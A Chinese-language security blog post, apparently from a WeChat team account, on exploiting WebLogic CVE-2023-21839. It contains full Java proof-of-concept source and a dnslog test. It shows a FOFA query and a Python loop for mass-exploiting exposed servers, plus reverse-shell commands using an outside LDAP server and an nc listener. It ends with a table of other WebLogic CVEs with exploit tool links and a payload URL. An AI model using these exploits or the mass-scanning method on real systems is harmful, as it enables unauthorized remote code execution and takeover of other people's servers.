Weblogic
CVE-2023-21839(JNDI)
漏洞描述
影响版本
Weblogic 12.2.1.3.0
Weblogic 12.2.1.4.0
Weblogic 14.1.1.0.0
测试环境
git clone https://github.com/vulhub/vulhub.git
cd vulhub//weblogic/CVE-2023-21839/
docker-compose up -d
漏洞复现
方法一:使用DXask88MA师傅的工具:https://github.com/DXask88MA/Weblogic-CVE-2023-21839
选择的sink点在weblogic.deployment.jms.ForeignOpaqueReference.class
具体POC为:
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Random;
public class CVE_2023_21839 {
static String JNDI_FACTORY="weblogic.jndi.WLInitialContextFactory";
static String HOW_TO_USE="[*]java -jar 目标ip:端口 ldap地址ne.g. java -jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111";
private static InitialContext getInitialContext(String url)throws NamingException
{
Hashtable<String,String> env = new Hashtable<String,String>();
env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
env.put(Context.PROVIDER_URL, url);
return new InitialContext(env);
}
public static void main(String args[]) throws Exception {
if(args.length <2){
System.out.println(HOW_TO_USE);
System.exit(0);
}
String t3Url = args[0];
String ldapUrl = args[1];
InitialContext c=getInitialContext("t3://"+t3Url);
Hashtable<String,String> env = new Hashtable<String,String>();
env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");
weblogic.deployment.jms.ForeignOpaqueReference f=new weblogic.deployment.jms.ForeignOpaqueReference();
Field jndiEnvironment=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
jndiEnvironment.setAccessible(true);
jndiEnvironment.set(f,env);
Field remoteJNDIName=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
remoteJNDIName.setAccessible(true);
remoteJNDIName.set(f,ldapUrl);
String bindName = new Random(System.currentTimeMillis()).nextLong()+"";
try{
c.bind(bindName,f);
c.lookup(bindName);
}catch(Exception e){ }
}
}
结合ceye进行dnslog尝试:
java -jar Weblogic-CVE-2023-21839.jar 10.163.0.101:7001 ldap://weblogic.xxxxxxx.ceye.io
rce漏洞执行成功。
方法二:利用https://github.com/KimJun1010/WeblogicTool 工具
批量漏扫
fofa搜索语句:
app="WebLogic-Server" || app="Weblogic_interface_7001"
批量收集目标后,使用python执行即可:
os.system("java -jar Weblogic-CVE-2023-21839.jar %s ldap://%s.xxxx.ceye.io" % (target, target.split(":")[0]))
rce漏洞排着队就来了
反弹shell
运行语句:java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 服务器ip
接着在该服务器上进行端口监听 nc -lvp xxxx
java -jar Weblogic-CVE-2023-21839.jar目标 IP:7001 ldap://ldap服务器IP:1389/Basic/ReverseShell/ldap服务器IP/nc监听端口
执行后:
查看nc监听页面shell接收情况:
反弹shell成功。
隐侠要会做的事情 :举一反三
漏洞标题 |
影响范围 |
危害 |
利用工具 |
CVE-2022-21371 WebLogic Local File Inclusion 本地文件包含漏洞 |
WebLogic 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 |
—— |
.//META-INF/MANIFEST.MF .//WEB-INF/web.xml .//WEB-INF/portlet.xml .//WEB-INF/weblogic.xml |
CVE-2021-2394 Weblogic 二次反序列化漏洞 |
WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 WebLogic 12.2.1.3.0 WebLogic 12.2.1.4.0 WebLogic 14.1.1.0.0 |
在未授权的情况下通过IIOP、T3协议对存在漏洞的WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。 |
https://github.com/lz2y/CVE-2021-2394/releases/tag/2.0 |
CVE-2021-2109 Weblogic LDAP 远程代码执行漏洞 |
WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 WebLogic 12.2.1.3.0 WebLogic 12.2.1.4.0 WebLogic 14.1.1.0.0 |
实现远程代码执行 |
url/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22) |
CVE-2020-14756 Weblogic Server 远程代码执行漏洞 |
Weblogic 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 |
利用weblogic coherence组件中的类,绕过了黑名单机制的检测,重新能够利用黑名单中的类,造成代码执行。 |
|
CVE-2020-2551(JRMP) |
10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0。 |
序列化对象可以任意构造,并没有进行安全检查 |
https://github.com/KimJun1010/WeblogicTool
|
CVE-2019-2725 Weblogic 反序列化远程代码执行漏洞 |
Weblogic 10.3.6 Weblogic 12.1.3 |
击者可以发送精心构造的恶意HTTP请求,在未授权的情况下远程执行命令。 |
https://github.com/TopScrew/CVE-2019-2725 |
CVE-2017-10271 Weblogic XMLDecoder 远程代码执行漏洞 |
Weblogic 10.3.6.0.0 Weblogic 12.1.3.0.0 Weblogic 12.2.1.0.0 Weblogic 12.2.1.2.0 |
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 |
http://xxx.xxx.xxx.xxx:7001/wls-wsat/CoordinatorPortType |
CVE-2016-3510 WebLogic T3 反序列化漏洞 |
WebLogic 12.2.1.0 WebLogic 12.1.3.0 WebLogic 12.1.2.0 WebLogic 10.3.6.0
|
者在可以通过该漏洞实现远程命令执行。 |
团队简介
点击上方蓝字关注“东方隐侠安全团队”;设为⭐️星标,江湖上好联系哟
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论